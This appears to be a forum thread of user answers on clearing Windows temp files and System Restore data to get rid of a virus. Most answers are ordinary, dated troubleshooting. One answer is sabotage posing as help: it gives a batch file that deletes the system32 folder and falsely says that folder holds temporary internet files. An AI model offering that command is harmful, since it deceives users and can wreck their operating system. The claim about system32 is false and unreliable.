Open Control Panel. Double click on 'System'. Click on the 'Performance' tab. Click on 'File System'. Click on the 'Troubleshooting' tab. Check the box marked 'Disable System Restore' Click 'Apply' and OK your way back to the desktop. You will now be able to delete the temporary file in Restore (and anything else as well!). When you've finished go through the same procedure and un-check the 'Disable System Restore' box. Do not re-boot your machine while this box is checked or you will lose all your previous restore settings.
Always Keep Deleting All files from your Temp Folder that is located in c:\windows\temp By this you may get rid of any virus, otherwise attempt an online scan by going to Housecall.antivirus.com Regards Nauman Turn off System Restore, delete all cookies and temp files, restart your computer, run AVG, and then remove the virus, restart. Turn System Restore back on and restart.
No. I regularly delete everything in my Temp folder. They are not needed.
Just delete temporary internet files by clicking Delete file Button in the Internet Options (Tools>Internet Options) If you find this info useful, please vote
Delete all files in the "temp" folders
Simplest way in Internet Explorer is go into Tools/Internet options/general and delete files. Aletrnatively use Windows explorer (Accessories) to go into the folder in your C drive TEMP and delete them manually.
Assuming you know the location of the infected file: For example if there was an infected file at c:\temp\abcde.exe Load CMD (cmd.exe) At the c:\> type del c:\temp\abcde.exe this will delete the infected file aslong as the file is not being protected or has permissions preventing deletion.
Unless you are making a site yourself and saved the HTML files for later uploading, it is normally safe to deleate HTML files. Html files are website pages which are normally saved for later use by the internet explorer. These are normally saved in a temp folder and can be deleted. Other uses for HTML files are help files, which if deleted, you may not view the help file of the program. Therefore before deleting HTML files, check the folder from where you will delete the files. If they are from a program file, it is not recommended to delete the files, if they are from the internet temporary folder, you can either delete the files manually or you can delete them from the internet explorer by pressing on Delete Browsing History found in Tools.
Yes. If you go start, all programs, accesories, system cleanup and use that.
To remove the Trojan from C:restore-temp You need to delete your restore files. The best thing to do is a system restore. If you do not have a safe restore point, Just delete the restore files.You can do this by going to My Computer properties (System Properties) select System Restore tab and check turn off system restore, click apply. Now your restore files together with the Trojan will be removed. Now turn on System Restore again. Could you please give the Trojan name?
open up notepad type the following: @echo off del c:\WINDOWS\system32 save the file as anything.bat (remember to add the .bat extension and save as all files) double click and it will delete the system32 folder. said folder is the where the majority of your temp. internet files are located. getting rid of them should work.
You have to look for it, any files that look like they shouldn't belong you might want to delete. It can really be hidden anywhere, but the most common places are the Temp folder, System32, and the Windows folder. Check your Temp folder (Start> Run > %temp%), sometimes a virus can be sitting there in plain sight. Try not to delete the System32 folder though ;).
If you go to Start-> Programs->Accessories -> System Tools -> System Restore. It should open the System Restore Program. On the left side it should have System Restore Settings. Click on that. Then there should be a box to check to turn off monitoring on all drives. Check that and save. Now...if you know what program you downloaded that gave you the virus.....uninstall and delete it. Manually check the temp files to make sure they are empty. Empty the recycle bin and clear cookies from your browser and site history. Then run your Antivirus software. If it detected it before, it should see it if it is in the restore file(cause now it is a regular file and not skipped with the antivirus) and get rid of it. Make sure your .dat files for your antivirus is up to date.